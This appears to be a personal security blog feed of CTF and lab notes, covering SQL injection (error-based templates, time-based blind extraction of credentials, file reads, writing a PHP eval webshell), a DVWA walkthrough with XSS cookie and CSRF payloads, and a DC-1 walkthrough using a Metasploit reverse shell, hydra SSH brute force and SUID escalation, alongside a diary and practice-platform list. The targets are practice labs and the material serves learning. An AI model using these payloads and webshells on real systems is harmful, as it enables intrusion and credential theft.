src="https://gitee.com/fogpost/photo/raw/master/202411241709101.png" srcset="/img/loading.gif" lazyload><br>What we need here is the first error, because in practice we cannot see the result of a correct query; there is a return value only when an error is hit</p><h3 id="子查询"><a href="#子查询" class="headerlink" title="子查询"></a>Subqueries</h3><p>Subquery: an inner query; allows another query to be nested inside the current query</p><blockquote><p>MariaDB [dvwa]> SELECT concat("test: ",(select database())) as a;<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241654803.png" srcset="/img/loading.gif" lazyload><br>The operation first runs (select database()), then joins the result with "test: ", and finally returns the result.</p></blockquote><p>During injection we do not know the database and table names, so we can borrow the information_schema database to guess: information_schema.schemata contains all of MySQL's database names, information_schema.tables contains all the table names, and information_schema.columns contains all the column names<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241703198.png" srcset="/img/loading.gif" lazyload></p><h3 id="报错注入模板"><a href="#报错注入模板" class="headerlink" title="报错注入模板"></a>Error-based injection templates</h3><ul><li>select 1/0</li><li>select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a</li><li>extractvalue(1, concat(0x5c,(select user())))</li><li>updatexml(0x3a,concat(1,(select user())),1)</li><li>exp(~(SELECT * from(select user())a))</li><li>ST_LatFromGeoHash((select * from(select * from(select user())a)b))</li><li>GTID_SUBSET(version(), 1)</li></ul><h1 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>Time-based blind injection</h1><p>?id=1' and if(1=1,sleep(5),1)--+<br>Determine the parameter construction.<br>?id=1'and if(length((select database()))>9,sleep(5),1)--+<br>Determine the database name length</p><p>?id=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+<br>Determine the database name character by character<br>?id=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+<br>Determine the total length of all table names</p><p>?id=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+<br>Determine the table names character by character<br>?id=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+<br>Determine the total length of all column names</p><p>?id=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+<br>Determine the column names character by character.<br>?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+<br>Determine the length of the column contents</p><p>?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+<br>Check the contents character by character.</p><h1 id="通过sql来getshell"><a href="#通过sql来getshell" class="headerlink" title="通过sql来getshell"></a>Getting a shell through SQL</h1><h2 id="条件和原理"><a href="#条件和原理" class="headerlink" title="条件和原理"></a>Conditions and principle</h2><blockquote><p>Conditions:<br> root privileges<br> the absolute path of the web root is known<br> secure_file_priv is empty or points to a directory (its value can be read through the @@secure_file_priv parameter)<br> gpc is off<br>Principle:<br> write a webshell, execute system commands through a parameter, and delete the webshell when finished<br>Appendix: SQL Server getshell conditions and principle<br> Conditions:<br> outbound connections are supported<br> sa privileges<br> Principle:<br> enable the xp_cmdshell extension to execute system commands </p></blockquote><h2 id="读写文件"><a href="#读写文件" class="headerlink" title="读写文件"></a>Reading and writing files</h2><blockquote><p>?id=-1)))))) union select load_file('/etc/passwd'),2%23<br>root:x:0:0:root:/root:/bin/ash<br>bin:x:1:1:bin:/bin:/sbin/nologin<br>daemon:x:2:2:daemon:/sbin:/sbin/nologin<br>adm:x:3:4:adm:/var/adm:/sbin/nologin<br>lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br>sync:x:5:0:sync:/sbin:/bin/sync<br>shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown<br>halt:x:7:0:halt:/sbin:/sbin/halt<br>mail:x:8:12:mail:/var/mail:/sbin/nologin<br>news:x:9:13:news:/usr/lib/news:/sbin/nologin<br>uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin<br>operator:x:11:0:operator:/root:/sbin/nologin<br>man:x:13:15:man:/usr/man:/sbin/nologin<br>postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin<br>cron:x:16:16:cron:/var/spool/cron:/sbin/nologin<br>ftp:x:21:21::/var/lib/ftp:/sbin/nologin<br>sshd:x:22:22:sshd:/dev/null:/sbin/nologin<br>at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin<br>squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin<br>xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin<br>games:x:35:35:games:/usr/games:/sbin/nologin<br>cyrus:x:85:12::/usr/cyrus:/sbin/nologin<br>vpopmail:x:89:89::/var/vpopmail:/sbin/nologin<br>ntp:x:123:123:NTP:/var/empty:/sbin/nologin<br>smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin<br>guest:x:405:100:guest:/dev/null:/sbin/nologin<br>nobody:x:65534:65534:nobody:/:/sbin/nologin<br>www-data:x:82:82:Linux User,,,:/home/www-data:/sbin/nologin<br>mysql:x:100:101:mysql:/var/lib/mysql:/sbin/nologin<br>nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin</p></blockquote><h2 id="读取nginx配置文件,寻找网站根目录"><a href="#读取nginx配置文件,寻找网站根目录" class="headerlink" title="读取nginx配置文件,寻找网站根目录"></a>Reading the nginx config file to find the web root</h2><blockquote><p>?id=-1)))))) union select load_file('/etc/nginx/nginx.conf'),2%23<br>Array ( [0] => Array ( [username] => daemon off; worker_processes auto; error_log /var/log/nginx/error.log 
warn; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { listen 80; server_name localhost; root /var/www/html; index index.php; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location / { try_files $uri $uri/ /index.php?$args; } location ~ .php$ { try_files $uri =404; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; } } } [password] => 2 ) )</p></blockquote><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span 
class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">Array</span><br>(<br> [<span class="hljs-number">0</span>] => <span class="hljs-title function_ invoke__">Array</span><br> (<br> [username] => daemon off;<br><br>worker_processes auto;<br><br>error_log /<span class="hljs-keyword">var</span>/log/nginx/error.log warn;<br><br>events {<br> worker_connections <span class="hljs-number">1024</span>;<br>}<br><br>http {<br> <span class="hljs-keyword">include</span> /etc/nginx/mime.types;<br> default_type application/octet-stream;<br> sendfile on;<br> keepalive_timeout <span class="hljs-number">65</span>;<br><br> server {<br> listen <span class="hljs-number">80</span>;<br> server_name localhost;<br> root /<span class="hljs-keyword">var</span>/www/html;<br> index index.php;<br><br> proxy_set_header Host <span class="hljs-variable">$host</span>;<br> proxy_set_header X-Real-IP <span class="hljs-variable">$remote_addr</span>;<br> proxy_set_header X-Forwarded-For <span class="hljs-variable">$proxy_add_x_forwarded_for</span>;<br><br> location / {<br> try_files <span class="hljs-variable">$uri</span> <span class="hljs-variable">$uri</span>/ /index.php?<span class="hljs-variable">$args</span>;<br> }<br><br> location ~ \.php$ {<br> try_files <span class="hljs-variable">$uri</span> =<span class="hljs-number">404</span>;<br> fastcgi_pass <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span>:<span class="hljs-number">9000</span>;<br> fastcgi_index index.php;<br> <span class="hljs-keyword">include</span> fastcgi_params;<br> fastcgi_param SCRIPT_FILENAME <span class="hljs-variable">$document</span>_root<span class="hljs-variable">$fastcgi_script_name</span>;<br> }<br><br> 
}<br>}<br> [password] => <span class="hljs-number">2</span><br> )<br><br>)<br></code></pre></td></tr></table></figure><h2 id="写入php探针"><a href="#写入php探针" class="headerlink" title="写入php探针:"></a>Writing a PHP probe:</h2><blockquote><p>?id=-1)))))) union select '<?php phpinfo();?>',2 into outfile '/var/www/html/info.php'%23<br><a href="http://node6.anna.nssctf.cn:28413/info.php">http://node6.anna.nssctf.cn:28413/info.php</a></p></blockquote><h2 id="写入webshell"><a href="#写入webshell" class="headerlink" title="写入webshell"></a>Writing a webshell</h2><blockquote><p>?id=-1)))))) union select '<?php eval($_POST["cc"]);?>',2 into outfile '/var/www/html/cc.php'%23<br>AntSword connection: <a href="http://node6.anna.nssctf.cn:28413/cc.php">http://node6.anna.nssctf.cn:28413/cc.php</a> password cc</p></blockquote>]]></content>
<categories>
<category>SQL</category>
</categories>
<tags>
<tag>sql</tag>
</tags>
</entry>
<entry>
<title>DVWA Full Walkthrough</title>
<link href="/2024/11/23/dvwa%E5%85%A8%E8%A7%A3/"/>
<url>/2024/11/23/dvwa%E5%85%A8%E8%A7%A3/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h1><p>When it comes to practice targets, the classic DVWA cannot be missed. It is a target very well suited to beginners: it integrates many kinds of vulnerabilities and lets you freely choose the difficulty. If you want to play with it, just set it up yourself; mine is set up on a server to play around with</p><h2 id="Low"><a href="#Low" class="headerlink" title="Low"></a>Low</h2><h3 id="Brute-Force"><a href="#Brute-Force" class="headerlink" title="Brute Force"></a>Brute Force</h3><p>Enter anything and this response comes back, meaning the password is wrong<br><img src="https://gitee.com/fogpost/photo/raw/master/202411231240412.png" srcset="/img/loading.gif" lazyload><br>Capture the request with a proxy and send it to the repeater. yakit's brute-forcing uses a file tag; the principle is the same as in Burp: it has requirements on the wordlist and uses the response size to tell right from wrong<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261753518.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411261806101.png" srcset="/img/loading.gif" lazyload></p><h3 id="command-injection"><a href="#command-injection" class="headerlink" title="command injection"></a>command injection</h3><p>Commands appended directly after the IP lookup are executed, scary; cat works as well<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261810028.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411261811659.png" srcset="/img/loading.gif" lazyload></p><h3 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h3><p>Capture the original password-change request, tweak it slightly in yakit and replay it to change the password; part of the URL can also be modified and replayed, and the change still succeeds<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261817959.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411261818130.png" srcset="/img/loading.gif" lazyload><br>A trick in this process is turning the long link into a short one with a webmaster tool, so the victim does not notice during social engineering<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261824846.png" srcset="/img/loading.gif" lazyload><br>A page can also be crafted</p><h3 id="XSS-DOM"><a href="#XSS-DOM" class="headerlink" title="XSS(DOM)"></a>XSS(DOM)</h3><p>Looking at the page source, there is no PHP code, only JS, so we can use a JS script<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261914977.png" srcset="/img/loading.gif" lazyload><br>Clicking English shows a plaintext URL, and we can use this English parameter to do something</p><blockquote><p><a href="http://110.41.22.24/vulnerabilities/xss_d/?default=English">http://110.41.22.24/vulnerabilities/xss_d/?default=English</a></p></blockquote><blockquote><p><a href="http://110.41.22.24/vulnerabilities/xss_d/?default=%5C">http://110.41.22.24/vulnerabilities/xss_d/?default=\</a><script>alert('xss')</script></p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411261906137.png" srcset="/img/loading.gif" lazyload></p><h3 id="XSS-Reflected"><a href="#XSS-Reflected" class="headerlink" title="XSS(Reflected)"></a>XSS(Reflected)</h3><p>Reflected XSS; looking at the source, it is the same as above except that this time the reflection happens in the input box<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261914096.png" srcset="/img/loading.gif" lazyload></p><blockquote><p><script>alert('xss')</script></p></blockquote><p>Grabbing the cookie</p><blockquote><p><script>alert(document.cookie)</script><br><img src="https://gitee.com/fogpost/photo/raw/master/202411261911735.png" srcset="/img/loading.gif" lazyload></p></blockquote>]]></content>
<categories>
<category>Penetration Testing</category>
</categories>
<tags>
<tag>dvwa</tag>
</tags>
</entry>
<entry>
<title>Setting up vulhub</title>
<link href="/2024/11/21/vulhub%E6%90%AD%E5%BB%BA/"/>
<url>/2024/11/21/vulhub%E6%90%AD%E5%BB%BA/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h1><p>This involves some classic vulnerabilities and practice environments. Having something ready to download is of course nice, but when we need to reproduce and build the environment ourselves many bugs appear, so a good tool for conveniently building practice environments is needed. That tool is vulhub, a docker-based collection of vulnerable environments that lets us set up a vulnerable environment quickly. Its author is p牛, also widely known as 离别歌; go have a look at his blog</p><h1 id="安装"><a href="#安装" class="headerlink" title="安装"></a>Installation</h1><p>vulhub is a docker-based tool platform; download docker and docker-compose yourself</p><h2 id="下载Vulhub"><a href="#下载Vulhub" class="headerlink" title="下载Vulhub"></a>Downloading Vulhub</h2><p>Create any folder, fetch the practice environments from github, then enter the vulhub directory</p><blockquote><p>git clone <a href="https://github.com/vulhub/vulhub.git">https://github.com/vulhub/vulhub.git</a><br>cd vulhub</p></blockquote><p>Enter any directory, for example shiro; use ls and cd to get into the CVE directory you want and start docker-compose<br>to create the environment. Pay attention to the memory allocation, and to version issues of the various tools for some vulnerabilities<br><img src="https://gitee.com/fogpost/photo/raw/master/202411211945375.png" srcset="/img/loading.gif" lazyload></p><p>Setting it up is pretty simple</p>]]></content>
<categories>
<category>Tools</category>
</categories>
<tags>
<tag>tool</tag>
</tags>
</entry>
<entry>
<title>Server Update Plan and Process</title>
<link href="/2024/11/20/%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%9B%B4%E6%96%B0%E8%AE%A1%E5%88%92%E5%92%8C%E6%B5%81%E7%A8%8B/"/>
<url>/2024/11/20/%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%9B%B4%E6%96%B0%E8%AE%A1%E5%88%92%E5%92%8C%E6%B5%81%E7%A8%8B/</url>
<content type="html"><![CDATA[]]></content>
</entry>
<entry>
<title>DC Privilege Escalation Target Machines</title>
<link href="/2024/11/19/DC-%E6%8F%90%E6%9D%83%E9%9D%B6%E6%9C%BA/"/>
<url>/2024/11/19/DC-%E6%8F%90%E6%9D%83%E9%9D%B6%E6%9C%BA/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h1><p>How can learning web security skip attacking target machines? Learning in the penetration direction must be grounded in attacking targets. A few days ago I read an article and found that the DC series is just right for training my skills and my understanding and use of tools</p><h1 id="平台"><a href="#平台" class="headerlink" title="平台"></a>Platform</h1><p>Attacker: kali2024.3<br>Target: DC series</p><h1 id="具体攻击"><a href="#具体攻击" class="headerlink" title="具体攻击"></a>The attack in detail</h1><h2 id="DC-1"><a href="#DC-1" class="headerlink" title="DC-1"></a>DC-1</h2><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>Information gathering</h3><h4 id="目标机ip"><a href="#目标机ip" class="headerlink" title="目标机ip"></a>Target IP</h4><p>After learning from ifconfig that my own IP is 192.168.56.135, use nmap to scan for live hosts on the same subnet</p><blockquote><p>nmap -sP 192.168.56.135/24<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191207141.png" srcset="/img/loading.gif" lazyload></p></blockquote><p>arp-scan also works:</p><blockquote><p>arp-scan -l<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191209537.png" srcset="/img/loading.gif" lazyload></p></blockquote><p>The target IP is found to be 192.168.56.146</p><h4 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>Port scan</h4><blockquote><p>nmap -A 192.168.56.146, a detailed scan of the corresponding services and versions<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191211378.png" srcset="/img/loading.gif" lazyload></p></blockquote><h4 id="目标访问"><a href="#目标访问" class="headerlink" title="目标访问"></a>Visiting the target</h4><p>Port 80 is open; visiting this IP in a browser shows a login page<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191214818.png" srcset="/img/loading.gif" lazyload><br>Use a directory scanning tool to look at the directories and files of this IP</p><h3 id="指纹识别"><a href="#指纹识别" class="headerlink" title="指纹识别"></a>Fingerprinting</h3><p>Use whatweb to fingerprint the web server; Firefox has a handy extension called Wappalyzer that can also show the CMS in use, though it may need a fast connection to work well</p><blockquote><p>whatweb -v 192.168.56.146 identifies the main system version, service version and PHP version<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191219907.png" srcset="/img/loading.gif" lazyload><br>Wappalyzer:<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191218063.png" srcset="/img/loading.gif" lazyload><br>The CMS is Drupal, version 7</p></blockquote><h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>Exploitation</h3><p>Once the CMS is known, we can try msf's ready-made attack modules</p><h4 id="msfconsole获取session"><a href="#msfconsole获取session" class="headerlink" title="msfconsole获取session"></a>Getting a session with msfconsole</h4><blockquote><p>msfconsole, use the search command to look for vulnerabilities in the CMS<br>search Drupal<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191223407.png" srcset="/img/loading.gif" lazyload><br>Number 1 is usable; set the parameters of the attack module<br>use 1<br>show payloads<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191225109.png" srcset="/img/loading.gif" lazyload><br>These payloads may be related to the tcp ports found earlier, so choose the payload php/meterpreter/reverse_tcp<br>set payload php/meterpreter/reverse_tcp<br>show options<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191227042.png" srcset="/img/loading.gif" lazyload><br>"yes" means required; most are already filled in, so we just set the IP for RHOSTS<br>set rhosts 192.168.56.146<br>exploit<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191229430.png" srcset="/img/loading.gif" lazyload><br>Execution completes and a session is obtained </p></blockquote><h4 id="获取shell登录sql"><a href="#获取shell登录sql" class="headerlink" title="获取shell登录sql"></a>Getting a shell and logging into SQL</h4><blockquote><p>Get DC-1's information and a shell, and use python to spawn a better interactive shell<br>sysinfo shell<br>python -c "import pty;pty.spawn('/bin/bash')"<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191233860.png" srcset="/img/loading.gif" lazyload><br>ls and cat to view flag1<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191235094.png" srcset="/img/loading.gif" lazyload><br>Use find . -name "set*" to look for set files<br>The settings file is found; viewing it reveals a flag and the database credentials<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191237652.png" srcset="/img/loading.gif" lazyload><br>Log into the database with the database account and password<br>mysql -udbuser -pR0ck3t<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201642780.png" srcset="/img/loading.gif" lazyload><br>show databases; lists the databases<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201642468.png" srcset="/img/loading.gif" lazyload><br>use drupaldb; show tables; lists the tables, and the users table is found<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201644727.png" srcset="/img/loading.gif" lazyload><br>View the table with select * from users; view the table structure with desc users;<br>The name and pass columns are found<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201646673.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411201647915.png" srcset="/img/loading.gif" lazyload></p></blockquote><h4 id="覆盖admin密码登录"><a href="#覆盖admin密码登录" class="headerlink" title="覆盖admin密码登录"></a>Overwriting the admin password to log in</h4><blockquote><p>Check the hashing method by searching for files: find . -name "password*"<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201651432.png" srcset="/img/loading.gif" lazyload><br>Look at password-hash.sh; it is a PHP hashing script that uses Drupal's password algorithm (based on PBKDF2 with a configurable work factor) to generate a salted secure hash. Not being able to work that out ourselves, we use it to generate the hash of a password and then overwrite the stored hash with it to log in<br>php ./scripts/password-hash.sh 123456<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201656246.png" srcset="/img/loading.gif" lazyload><br>hash: $S$Dyi0o5A9rq9O4imggBtz.INzLGWgqCjo67vC15JYgHjEVtkpdV/F<br>Overwrite admin's password<br>mysql>update users set pass="$S$Dyi0o5A9rq9O4imggBtz.INzLGWgqCjo67vC15JYgHjEVtkpdV/F" where name="admin";<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201700729.png" srcset="/img/loading.gif" lazyload><br>Login succeeds, and afterwards flag3 is found in the dashboard<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201700614.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411201701862.png" srcset="/img/loading.gif" lazyload></p></blockquote><h4 id="获取flag4,爆破密码"><a href="#获取flag4,爆破密码" class="headerlink" title="获取flag4,爆破密码"></a>Getting flag4 by brute-forcing the password</h4><blockquote><p>Look at etc/passwd and find the flag4 account; check flag4's home directory<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201702238.png" srcset="/img/loading.gif" lazyload><br>This time it says we need the root directory and asks us to brute-force<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201703822.png" srcset="/img/loading.gif" lazyload><br>We might also be unable to access /home/flag4/flag4.txt; the hydra tool can brute-force flag4's password, which turns out to be orange<br>hydra -l flag4 -P /usr/share/john/password.lst 192.168.56.146 ssh<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201709083.png" srcset="/img/loading.gif" lazyload></p></blockquote><h3 id="提权"><a href="#提权" class="headerlink" title="提权"></a>Privilege escalation</h3><h4 id="suid提权"><a href="#suid提权" class="headerlink" title="suid提权"></a>SUID privilege escalation</h4><p>Find a file owned by root that has the s bit set</p><ul><li>SUID (Set User ID) lets the caller run the file as the file's owner, so the idea behind SUID privilege escalation is to run a SUID file owned by the root user; when we run that file we obtain the identity of the root user.</li></ul><p>常见的可用于 SUID 
提权的文件有:</p><blockquote><p>find、bash、nmap、vim、more、less、nano、cp<br>//当没有s权限时可以使用:chmod u+s 命令路径,增加权限</p></blockquote><p>查找哪些命令具备 SUID 标识</p><blockquote><p>find / -perm -4000 2>/dev/null<br>find / -perm -u=s -type f 2>/dev/null</p></blockquote><p>发现find文件<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201714007.png" srcset="/img/loading.gif" lazyload><br>使用find文件来提权:<br>利用 find 命令随便查找一个正确的文件(夹)路径,后面加上 -exec shell 命令 ;<br>提权 /bin/bash 或者 /bin/sh<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201717565.png" srcset="/img/loading.gif" lazyload><br>最后完成flag获取<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201719543.png" srcset="/img/loading.gif" lazyload></p><h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>DC-1虽然还是比较简单,但是流程也比较长在此做一个总结,DC-1靶机主要考察了信息收集、漏洞利用、权限提升、提权等基本知识。<br>数据库的操作,suid提权,hydra爆破ssh端口,这些都是我之前没有接触过的跟着流程走一边还是挺好的</p>]]></content>
<categories>
<category>省投测试</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>电子榨菜</title>
<link href="/2024/11/18/%E7%94%B5%E5%AD%90%E6%A6%A8%E8%8F%9C/"/>
<url>/2024/11/18/%E7%94%B5%E5%AD%90%E6%A6%A8%E8%8F%9C/</url>
<content type="html"><![CDATA[<h1 id="电子榨菜"><a href="#电子榨菜" class="headerlink" title="电子榨菜"></a>电子榨菜 (Digital Pickles)</h1><h2 id="2024-10-26-23-06-28"><a href="#2024-10-26-23-06-28" class="headerlink" title="2024-10-26 23:06:28"></a>2024-10-26 23:06:28</h2><p>Writing down what I did. Right now I really want to play StarCraft and don't feel like writing, so let's just get it over with. This geekcode thing even replies to what I say, fun. For StarCraft I recommend the StarCraft tavern mode. While writing this I stumbled on a feature: VS Code's word wrap, just search for it, it's handy and wraps according to the current window size. The StarCraft campaign is so expensive, 250; if I had played ten years earlier it would even have been given away. Should I write down what to do tomorrow? Adding a comment; let's see if these are fun.<br><img src="https://gitee.com/fogpost/photo/raw/master/202410262318542.png"></p><h2 id="2024-10-29"><a href="#2024-10-29" class="headerlink" title="2024-10-29"></a>2024-10-29</h2><p>Today's Wangding Cup was another prison sentence: eight hours in total, and I spent a good five of them staring into space. This one was Android, also jail time. I've realized the reverse-engineering field is basically one big otome-game world: want mature and steady, we have Windows reversing; want witty and humorous, we have Android reversing; want a handsome "husband-sister", we have hardware reversing; we in reversing really eat well. Damn, something big just happened: dog-ass Microsoft ate my post, the PHP webshell post got deleted outright with no way to restore it. Looks like I'll have to rely on images from now on. In the evening I went out partying with the room 337 guys and got badly screwed over by ylq; what a dog-ass dump of a place, inedible. Next time I'll take my good friend hy out to eat. Starting tomorrow let's look at the core principles of reverse engineering; I've accumulated far too little.<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292358898.jpg"></p><h2 id="2024-11-7"><a href="#2024-11-7" class="headerlink" title="2024-11-7"></a>2024-11-7</h2><p>It's been a while since the last entry, more than a week. This week felt like slacking off. I need to leave the dorm earlier to review, otherwise I'll fail a major course, and I absolutely must not fail, it would be unbearable. I did set a challenge for the first-years, but it doesn't feel right to post the solution process now; I'll pull it out of the drafts after the contest ends. Recently I came across another new CTF knowledge site; it looks pretty good but has the usual problem: the reversing side is really weak. I'm thinking about building my own reverse-wiki to properly strengthen this area, otherwise reversing might as well just be merged with pwn; though they're similar anyway, there is still a difference between the process of reversing and that of exploitation.</p><h2 id="2024-11-10"><a href="#2024-11-10" class="headerlink" title="2024-11-10"></a>2024-11-10</h2><p>Two more days gone. Time to start reviewing blockchain; and remember the online courses, those have to be watched. Recently I found another handy tool, Microsoft To Do; it lacks a few features but it works, TickTick is a bit of a hassle. Algorithms: write, write, write. Every weekend is one big slack-off. It looks like the reverse-wiki will have to wait for winter break, but winter break is when I have to start preparing for the graduate entrance exam, so time is short. Let's see if I can make a good start over the break.<br><img src="https://gitee.com/fogpost/photo/raw/master/202411102003839.png"></p><h2 id="2024-11-18"><a href="#2024-11-18" class="headerlink" title="2024-11-18"></a>2024-11-18</h2><p>Damn it, it's this late again. Looks like I need to get out and actively study; in the dorm I just slack off. Rotten software engineering, I don't know how to review it. Last night my roommates and I again discussed how to get by in life. Life is a long road: graduate school, the civil service exam, or going straight to work are all options. I want to go to graduate school, and I will certainly do it, but is that really how things are? It really is.<br><img src="https://gitee.com/fogpost/photo/raw/master/202411182346697.png"></p>]]></content>
<categories>
<category>电子榨菜</category>
</categories>
<tags>
<tag>snake</tag>
</tags>
</entry>
<entry>
<title>Web security learning path</title>
<link href="/2024/11/15/web%E5%AE%89%E5%85%A8%E6%B5%81%E7%A8%8B/"/>
<url>/2024/11/15/web%E5%AE%89%E5%85%A8%E6%B5%81%E7%A8%8B/</url>
<content type="html"><![CDATA[<p>Author: Ph0rse<br>Link: <a href="https://www.zhihu.com/question/267204109/answer/320502511">https://www.zhihu.com/question/267204109/answer/320502511</a><br>Source: Zhihu<br>Copyright belongs to the author. For commercial reproduction, contact the author for authorization; for non-commercial reproduction, credit the source.</p><p>I. Early stage: a series of practice platforms, most of which have write-ups; if you really cannot solve something after ten-odd days, read the write-up.<br>SQL injection: RedTiger's Hackit<br>Web: 网络安全实验室|网络信息安全攻防学习平台 (Network Security Lab)<br>General: [WeChall]<br>Challenges, a classic old platform: 南京邮电大学网络攻防训练平台 (the NJUPT attack and defense training platform)<br>A general new platform: CTF - 练习平台 (CTF practice platform)<br>Penetration: Penetration test lab<br>A general hacking game: Game of Hacks<br>XCTF's training platform: XCTF实训平台 | 登 录<br>i春秋's CTF replay platform: <a href="https://www.ichunqiu.com/racing/58837">https://www.ichunqiu.com/racing/58837</a><br>Anheng's platform: 登录 - 明御® 攻防实验室<br>A general new platform whose binary challenges seem good: Jarvis OJ<br>A high-end platform with some hardware, cloud-security and intranet-penetration challenges: Exploit Exercises<br>Another high-end platform with Oracle and cryptography challenges: Under the Wire<br>Penetration practice platform: <a href="https://pentest.training/mockexams.php">https://pentest.training/mockexams.php</a><br>A code-auditing platform (not web-oriented; many are C-language audits, strongly recommended for the big shots to breeze through): Websec<br>A packaged CTF platform: Vulnerable Docker VM - NotSoSecure<br>Also packaged training environments: Vulnerable By Design ~ VulnHub<br>PHP security training platform: PHP Security Advent Calendar 2017<br>A foreign CTF wiki, quality seems so-so: Forgotten Security's CTF Wiki<br>A target range that pairs with Metasploit, Metasploitable: <a href="http://downloads.metasploit.com/data/metasploitable/metasploitable-linux-2.0.0.zip">http://downloads.metasploit.com/data/metasploitable/metasploitable-linux-2.0.0.zip</a><br>CTF tool library: CTF资源库|CTF工具下载|CTF工具包|CTF工具集合<br>The above is my own compilation; I also recommend other people's resource 